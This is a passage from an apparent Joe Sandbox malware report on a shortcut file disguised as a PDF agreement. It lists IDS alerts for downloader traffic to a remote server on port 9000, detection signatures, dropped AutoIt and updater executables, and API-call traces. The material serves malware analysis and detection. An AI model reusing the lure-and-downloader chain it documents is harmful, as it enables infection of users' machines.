2024-12-12T08:21:08.181856+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49846	185.147.124.236	9000	TCP
2024-12-12T08:21:09.717102+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49852	185.147.124.236	9000	TCP
2024-12-12T08:21:11.256983+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49853	185.147.124.236	9000	TCP
2024-12-12T08:21:12.804834+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49859	185.147.124.236	9000	TCP
2024-12-12T08:21:14.351221+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49865	185.147.124.236	9000	TCP
2024-12-12T08:21:15.897535+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49870	185.147.124.236	9000	TCP
2024-12-12T08:21:17.430782+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49871	185.147.124.236	9000	TCP
2024-12-12T08:21:18.975041+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49877	185.147.124.236	9000	TCP
2024-12-12T08:21:20.497789+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49883	185.147.124.236	9000	TCP
2024-12-12T08:21:22.029157+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49884	185.147.124.236	9000	TCP
2024-12-12T08:21:23.563463+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49890	185.147.124.236	9000	TCP
2024-12-12T08:21:25.107135+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49896	185.147.124.236	9000	TCP
2024-12-12T08:21:26.646417+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49901	185.147.124.236	9000	TCP
2024-12-12T08:21:28.179242+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49903	185.147.124.236	9000	TCP
2024-12-12T08:21:29.725608+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49909	185.147.124.236	9000	TCP
2024-12-12T08:21:31.365786+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49914	185.147.124.236	9000	TCP
2024-12-12T08:21:32.899651+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49916	185.147.124.236	9000	TCP
2024-12-12T08:21:34.444178+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49923	185.147.124.236	9000	TCP
2024-12-12T08:21:35.966946+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49928	185.147.124.236	9000	TCP
2024-12-12T08:21:37.640802+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49932	185.147.124.236	9000	TCP
2024-12-12T08:21:39.199091+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49936	185.147.124.236	9000	TCP
2024-12-12T08:21:40.733281+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49942	185.147.124.236	9000	TCP
2024-12-12T08:21:42.264147+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49947	185.147.124.236	9000	TCP
2024-12-12T08:21:43.795587+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49949	185.147.124.236	9000	TCP
2024-12-12T08:21:45.338236+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49955	185.147.124.236	9000	TCP
2024-12-12T08:21:46.947570+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49960	185.147.124.236	9000	TCP
2024-12-12T08:21:48.485451+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49962	185.147.124.236	9000	TCP
2024-12-12T08:21:50.014607+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49968	185.147.124.236	9000	TCP
2024-12-12T08:21:52.107679+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49975	185.147.124.236	9000	TCP
2024-12-12T08:21:53.722664+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49980	185.147.124.236	9000	TCP
2024-12-12T08:21:55.256500+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49986	185.147.124.236	9000	TCP
2024-12-12T08:21:56.793962+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49988	185.147.124.236	9000	TCP
2024-12-12T08:21:58.326924+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49993	185.147.124.236	9000	TCP
2024-12-12T08:21:59.876083+0100	2052248	1	A Network Trojan was detected	192.168.2.5	49999	185.147.124.236	9000	TCP
2024-12-12T08:22:01.411084+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50001	185.147.124.236	9000	TCP
2024-12-12T08:22:02.949154+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50007	185.147.124.236	9000	TCP
2024-12-12T08:22:04.483896+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50012	185.147.124.236	9000	TCP
2024-12-12T08:22:06.190612+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50014	185.147.124.236	9000	TCP
2024-12-12T08:22:07.745866+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50019	185.147.124.236	9000	TCP
2024-12-12T08:22:09.288314+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50025	185.147.124.236	9000	TCP
2024-12-12T08:22:10.857565+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50030	185.147.124.236	9000	TCP
2024-12-12T08:22:12.396570+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50032	185.147.124.236	9000	TCP
2024-12-12T08:22:13.920443+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50039	185.147.124.236	9000	TCP
2024-12-12T08:22:15.451178+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50044	185.147.124.236	9000	TCP
2024-12-12T08:22:16.992116+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50046	185.147.124.236	9000	TCP
2024-12-12T08:22:18.531064+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50052	185.147.124.236	9000	TCP
2024-12-12T08:22:20.060280+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50057	185.147.124.236	9000	TCP
2024-12-12T08:22:21.592672+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50059	185.147.124.236	9000	TCP
2024-12-12T08:22:23.157456+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50061	185.147.124.236	9000	TCP
2024-12-12T08:22:24.693899+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50063	185.147.124.236	9000	TCP
2024-12-12T08:22:26.243959+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50064	185.147.124.236	9000	TCP
2024-12-12T08:22:27.779953+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50065	185.147.124.236	9000	TCP
2024-12-12T08:22:29.361748+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50066	185.147.124.236	9000	TCP
2024-12-12T08:22:30.897485+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50067	185.147.124.236	9000	TCP
2024-12-12T08:22:32.445741+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50068	185.147.124.236	9000	TCP
2024-12-12T08:22:33.993469+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50071	185.147.124.236	9000	TCP
2024-12-12T08:22:35.537822+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50072	185.147.124.236	9000	TCP
2024-12-12T08:22:37.078887+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50073	185.147.124.236	9000	TCP
2024-12-12T08:22:38.616823+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50074	185.147.124.236	9000	TCP
2024-12-12T08:22:40.155752+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50075	185.147.124.236	9000	TCP
2024-12-12T08:22:41.685871+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50076	185.147.124.236	9000	TCP
2024-12-12T08:22:43.217997+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50078	185.147.124.236	9000	TCP
2024-12-12T08:22:44.762063+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50079	185.147.124.236	9000	TCP
2024-12-12T08:22:46.319486+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50081	185.147.124.236	9000	TCP
2024-12-12T08:22:47.857920+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50082	185.147.124.236	9000	TCP
2024-12-12T08:22:49.390178+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50084	185.147.124.236	9000	TCP
2024-12-12T08:22:50.920508+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50085	185.147.124.236	9000	TCP
2024-12-12T08:22:52.461292+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50086	185.147.124.236	9000	TCP
2024-12-12T08:22:54.001817+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50087	185.147.124.236	9000	TCP
2024-12-12T08:22:55.539578+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50088	185.147.124.236	9000	TCP
2024-12-12T08:22:57.554609+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50089	185.147.124.236	9000	TCP
2024-12-12T08:22:59.100326+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50090	185.147.124.236	9000	TCP
2024-12-12T08:23:00.636764+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50091	185.147.124.236	9000	TCP
2024-12-12T08:23:02.180164+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50092	185.147.124.236	9000	TCP
2024-12-12T08:23:03.720078+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50093	185.147.124.236	9000	TCP
2024-12-12T08:23:05.259644+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50094	185.147.124.236	9000	TCP
2024-12-12T08:23:06.834496+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50095	185.147.124.236	9000	TCP
2024-12-12T08:23:08.552308+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50096	185.147.124.236	9000	TCP
2024-12-12T08:23:10.100473+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50097	185.147.124.236	9000	TCP
2024-12-12T08:23:11.647035+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50098	185.147.124.236	9000	TCP
2024-12-12T08:23:13.179463+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50099	185.147.124.236	9000	TCP
2024-12-12T08:23:14.731035+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50100	185.147.124.236	9000	TCP
2024-12-12T08:23:16.273791+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50101	185.147.124.236	9000	TCP
2024-12-12T08:23:17.812365+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50102	185.147.124.236	9000	TCP
2024-12-12T08:23:19.343977+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50103	185.147.124.236	9000	TCP
2024-12-12T08:23:20.873820+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50105	185.147.124.236	9000	TCP
2024-12-12T08:23:22.422696+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50107	185.147.124.236	9000	TCP
2024-12-12T08:23:24.030101+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50108	185.147.124.236	9000	TCP
2024-12-12T08:23:25.563504+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50109	185.147.124.236	9000	TCP
2024-12-12T08:23:27.095613+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50110	185.147.124.236	9000	TCP
2024-12-12T08:23:28.632572+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50111	185.147.124.236	9000	TCP
2024-12-12T08:23:30.175475+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50112	185.147.124.236	9000	TCP
2024-12-12T08:23:31.734844+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50113	185.147.124.236	9000	TCP
2024-12-12T08:23:33.266686+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50114	185.147.124.236	9000	TCP
2024-12-12T08:23:34.796806+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50115	185.147.124.236	9000	TCP
2024-12-12T08:23:36.326408+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50116	185.147.124.236	9000	TCP
2024-12-12T08:23:37.872595+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50118	185.147.124.236	9000	TCP
2024-12-12T08:23:39.413813+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50119	185.147.124.236	9000	TCP
2024-12-12T08:23:40.959504+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50121	185.147.124.236	9000	TCP
2024-12-12T08:23:42.491618+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50122	185.147.124.236	9000	TCP
2024-12-12T08:23:44.039504+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50124	185.147.124.236	9000	TCP
2024-12-12T08:23:45.586977+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50125	185.147.124.236	9000	TCP
2024-12-12T08:23:47.144311+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50126	185.147.124.236	9000	TCP
2024-12-12T08:23:48.678275+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50127	185.147.124.236	9000	TCP
2024-12-12T08:23:50.201751+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50128	185.147.124.236	9000	TCP
2024-12-12T08:23:51.732886+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50129	185.147.124.236	9000	TCP
2024-12-12T08:23:53.266335+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50130	185.147.124.236	9000	TCP
2024-12-12T08:23:54.804045+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50131	185.147.124.236	9000	TCP
2024-12-12T08:23:56.364749+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50132	185.147.124.236	9000	TCP
2024-12-12T08:23:57.889654+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50133	185.147.124.236	9000	TCP
2024-12-12T08:23:59.420235+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50134	185.147.124.236	9000	TCP
2024-12-12T08:24:00.951215+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50135	185.147.124.236	9000	TCP
2024-12-12T08:24:02.490296+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50136	185.147.124.236	9000	TCP
2024-12-12T08:24:04.021293+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50137	185.147.124.236	9000	TCP
2024-12-12T08:24:05.555408+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50138	185.147.124.236	9000	TCP
2024-12-12T08:24:07.125667+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50139	185.147.124.236	9000	TCP
2024-12-12T08:24:08.654349+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50140	185.147.124.236	9000	TCP
2024-12-12T08:24:10.185431+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50141	185.147.124.236	9000	TCP
2024-12-12T08:24:11.732456+0100	2052248	1	A Network Trojan was detected	192.168.2.5	50142	185.147.124.236	9000	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T08:20:30.334565+0100	2803305	3	Unknown Traffic	192.168.2.5	49736	185.147.124.236	9000	TCP
2024-12-12T08:20:31.873343+0100	2803305	3	Unknown Traffic	192.168.2.5	49742	185.147.124.236	9000	TCP
2024-12-12T08:20:38.063000+0100	2803305	3	Unknown Traffic	192.168.2.5	49761	185.147.124.236	9000	TCP
2024-12-12T08:20:39.601047+0100	2803305	3	Unknown Traffic	192.168.2.5	49762	185.147.124.236	9000	TCP
2024-12-12T08:20:41.177323+0100	2803305	3	Unknown Traffic	192.168.2.5	49768	185.147.124.236	9000	TCP
2024-12-12T08:20:42.718553+0100	2803305	3	Unknown Traffic	192.168.2.5	49774	185.147.124.236	9000	TCP
2024-12-12T08:20:44.263331+0100	2803305	3	Unknown Traffic	192.168.2.5	49776	185.147.124.236	9000	TCP
2024-12-12T08:20:45.794335+0100	2803305	3	Unknown Traffic	192.168.2.5	49781	185.147.124.236	9000	TCP
2024-12-12T08:20:50.750828+0100	2803305	3	Unknown Traffic	192.168.2.5	49794	185.147.124.236	9000	TCP
2024-12-12T08:20:53.841484+0100	2803305	3	Unknown Traffic	192.168.2.5	49806	185.147.124.236	9000	TCP
2024-12-12T08:20:55.373490+0100	2803305	3	Unknown Traffic	192.168.2.5	49812	185.147.124.236	9000	TCP
2024-12-12T08:20:56.921758+0100	2803305	3	Unknown Traffic	192.168.2.5	49813	185.147.124.236	9000	TCP
2024-12-12T08:20:58.648113+0100	2803305	3	Unknown Traffic	192.168.2.5	49819	185.147.124.236	9000	TCP
2024-12-12T08:21:00.196845+0100	2803305	3	Unknown Traffic	192.168.2.5	49825	185.147.124.236	9000	TCP
2024-12-12T08:21:01.738898+0100	2803305	3	Unknown Traffic	192.168.2.5	49826	185.147.124.236	9000	TCP
2024-12-12T08:21:05.072777+0100	2803305	3	Unknown Traffic	192.168.2.5	49839	185.147.124.236	9000	TCP
2024-12-12T08:21:08.181856+0100	2803305	3	Unknown Traffic	192.168.2.5	49846	185.147.124.236	9000	TCP
2024-12-12T08:21:11.256983+0100	2803305	3	Unknown Traffic	192.168.2.5	49853	185.147.124.236	9000	TCP
2024-12-12T08:21:14.351221+0100	2803305	3	Unknown Traffic	192.168.2.5	49865	185.147.124.236	9000	TCP
2024-12-12T08:21:17.430782+0100	2803305	3	Unknown Traffic	192.168.2.5	49871	185.147.124.236	9000	TCP
2024-12-12T08:21:18.975041+0100	2803305	3	Unknown Traffic	192.168.2.5	49877	185.147.124.236	9000	TCP
2024-12-12T08:21:20.497789+0100	2803305	3	Unknown Traffic	192.168.2.5	49883	185.147.124.236	9000	TCP
2024-12-12T08:21:22.029157+0100	2803305	3	Unknown Traffic	192.168.2.5	49884	185.147.124.236	9000	TCP
2024-12-12T08:21:25.107135+0100	2803305	3	Unknown Traffic	192.168.2.5	49896	185.147.124.236	9000	TCP
2024-12-12T08:21:28.179242+0100	2803305	3	Unknown Traffic	192.168.2.5	49903	185.147.124.236	9000	TCP
2024-12-12T08:21:31.365786+0100	2803305	3	Unknown Traffic	192.168.2.5	49914	185.147.124.236	9000	TCP
2024-12-12T08:21:32.899651+0100	2803305	3	Unknown Traffic	192.168.2.5	49916	185.147.124.236	9000	TCP
2024-12-12T08:21:34.444178+0100	2803305	3	Unknown Traffic	192.168.2.5	49923	185.147.124.236	9000	TCP
2024-12-12T08:21:37.640802+0100	2803305	3	Unknown Traffic	192.168.2.5	49932	185.147.124.236	9000	TCP
2024-12-12T08:21:39.199091+0100	2803305	3	Unknown Traffic	192.168.2.5	49936	185.147.124.236	9000	TCP
2024-12-12T08:21:40.733281+0100	2803305	3	Unknown Traffic	192.168.2.5	49942	185.147.124.236	9000	TCP
2024-12-12T08:21:43.795587+0100	2803305	3	Unknown Traffic	192.168.2.5	49949	185.147.124.236	9000	TCP
2024-12-12T08:21:46.947570+0100	2803305	3	Unknown Traffic	192.168.2.5	49960	185.147.124.236	9000	TCP
2024-12-12T08:21:48.485451+0100	2803305	3	Unknown Traffic	192.168.2.5	49962	185.147.124.236	9000	TCP
2024-12-12T08:21:50.014607+0100	2803305	3	Unknown Traffic	192.168.2.5	49968	185.147.124.236	9000	TCP
2024-12-12T08:21:55.256500+0100	2803305	3	Unknown Traffic	192.168.2.5	49986	185.147.124.236	9000	TCP
2024-12-12T08:22:01.411084+0100	2803305	3	Unknown Traffic	192.168.2.5	50001	185.147.124.236	9000	TCP
2024-12-12T08:22:02.949154+0100	2803305	3	Unknown Traffic	192.168.2.5	50007	185.147.124.236	9000	TCP
2024-12-12T08:22:06.190612+0100	2803305	3	Unknown Traffic	192.168.2.5	50014	185.147.124.236	9000	TCP
2024-12-12T08:22:07.745866+0100	2803305	3	Unknown Traffic	192.168.2.5	50019	185.147.124.236	9000	TCP
2024-12-12T08:22:10.857565+0100	2803305	3	Unknown Traffic	192.168.2.5	50030	185.147.124.236	9000	TCP
2024-12-12T08:22:16.992116+0100	2803305	3	Unknown Traffic	192.168.2.5	50046	185.147.124.236	9000	TCP
2024-12-12T08:22:20.060280+0100	2803305	3	Unknown Traffic	192.168.2.5	50057	185.147.124.236	9000	TCP
2024-12-12T08:22:21.592672+0100	2803305	3	Unknown Traffic	192.168.2.5	50059	185.147.124.236	9000	TCP
2024-12-12T08:22:26.243959+0100	2803305	3	Unknown Traffic	192.168.2.5	50064	185.147.124.236	9000	TCP
2024-12-12T08:22:29.361748+0100	2803305	3	Unknown Traffic	192.168.2.5	50066	185.147.124.236	9000	TCP
2024-12-12T08:22:30.897485+0100	2803305	3	Unknown Traffic	192.168.2.5	50067	185.147.124.236	9000	TCP
2024-12-12T08:22:35.537822+0100	2803305	3	Unknown Traffic	192.168.2.5	50072	185.147.124.236	9000	TCP
2024-12-12T08:22:43.217997+0100	2803305	3	Unknown Traffic	192.168.2.5	50078	185.147.124.236	9000	TCP
2024-12-12T08:22:46.319486+0100	2803305	3	Unknown Traffic	192.168.2.5	50081	185.147.124.236	9000	TCP
2024-12-12T08:22:47.857920+0100	2803305	3	Unknown Traffic	192.168.2.5	50082	185.147.124.236	9000	TCP
2024-12-12T08:22:50.920508+0100	2803305	3	Unknown Traffic	192.168.2.5	50085	185.147.124.236	9000	TCP
2024-12-12T08:22:57.554609+0100	2803305	3	Unknown Traffic	192.168.2.5	50089	185.147.124.236	9000	TCP
2024-12-12T08:23:00.636764+0100	2803305	3	Unknown Traffic	192.168.2.5	50091	185.147.124.236	9000	TCP
2024-12-12T08:23:06.834496+0100	2803305	3	Unknown Traffic	192.168.2.5	50095	185.147.124.236	9000	TCP
2024-12-12T08:23:20.873820+0100	2803305	3	Unknown Traffic	192.168.2.5	50105	185.147.124.236	9000	TCP
2024-12-12T08:23:24.030101+0100	2803305	3	Unknown Traffic	192.168.2.5	50108	185.147.124.236	9000	TCP
2024-12-12T08:23:30.175475+0100	2803305	3	Unknown Traffic	192.168.2.5	50112	185.147.124.236	9000	TCP
2024-12-12T08:23:31.734844+0100	2803305	3	Unknown Traffic	192.168.2.5	50113	185.147.124.236	9000	TCP
2024-12-12T08:23:37.872595+0100	2803305	3	Unknown Traffic	192.168.2.5	50118	185.147.124.236	9000	TCP
2024-12-12T08:23:40.959504+0100	2803305	3	Unknown Traffic	192.168.2.5	50121	185.147.124.236	9000	TCP
2024-12-12T08:23:44.039504+0100	2803305	3	Unknown Traffic	192.168.2.5	50124	185.147.124.236	9000	TCP
2024-12-12T08:23:47.144311+0100	2803305	3	Unknown Traffic	192.168.2.5	50126	185.147.124.236	9000	TCP
2024-12-12T08:23:51.732886+0100	2803305	3	Unknown Traffic	192.168.2.5	50129	185.147.124.236	9000	TCP
2024-12-12T08:24:02.490296+0100	2803305	3	Unknown Traffic	192.168.2.5	50136	185.147.124.236	9000	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T08:20:19.206623+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49710	172.67.223.31	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Agreement for Cooperation.PDF.lnk.download.lnk

Virustotal: Detection: 31%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: Agreement for Cooperation.PDF.lnk.download.lnk

Joe Sandbox ML: detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.223.31:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.223.31:443 -> 192.168.2.5:49707 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: updater.exe, 0000000B.00000003.2230085986.0000000004A94000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229933261.0000000004BB7000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235652956.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2358128445.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2349255697.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2348209254.0000000004E67000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433215959.00000000047D0000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2428081410.0000000004634000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427935882.0000000004757000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: updater.exe, 0000000B.00000003.2230085986.0000000004A94000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229933261.0000000004BB7000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235652956.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2358128445.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2349255697.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2348209254.0000000004E67000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433215959.00000000047D0000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2428081410.0000000004634000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427935882.0000000004757000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004C4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_004C4005
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004CC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	11_2_004CC2FF
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004C494A GetFileAttributesW,FindFirstFileW,FindClose,	11_2_004C494A
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004CCD14 FindFirstFileW,FindClose,	11_2_004CCD14
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004CCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	11_2_004CCD9F
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004CF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_004CF5D8
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004CF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_004CF735
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004CFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	11_2_004CFA36
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004C3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_004C3CE2
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0133203D FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	11_2_0133203D
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_01332145 FindFirstFileA,GetLastError,	11_2_01332145
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0132F96D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	11_2_0132F96D
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009E4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	14_2_009E4005
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009EC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	14_2_009EC2FF
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009E494A GetFileAttributesW,FindFirstFileW,FindClose,	14_2_009E494A
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009ECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	14_2_009ECD9F
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009ECD14 FindFirstFileW,FindClose,	14_2_009ECD14
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009EF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	14_2_009EF5D8
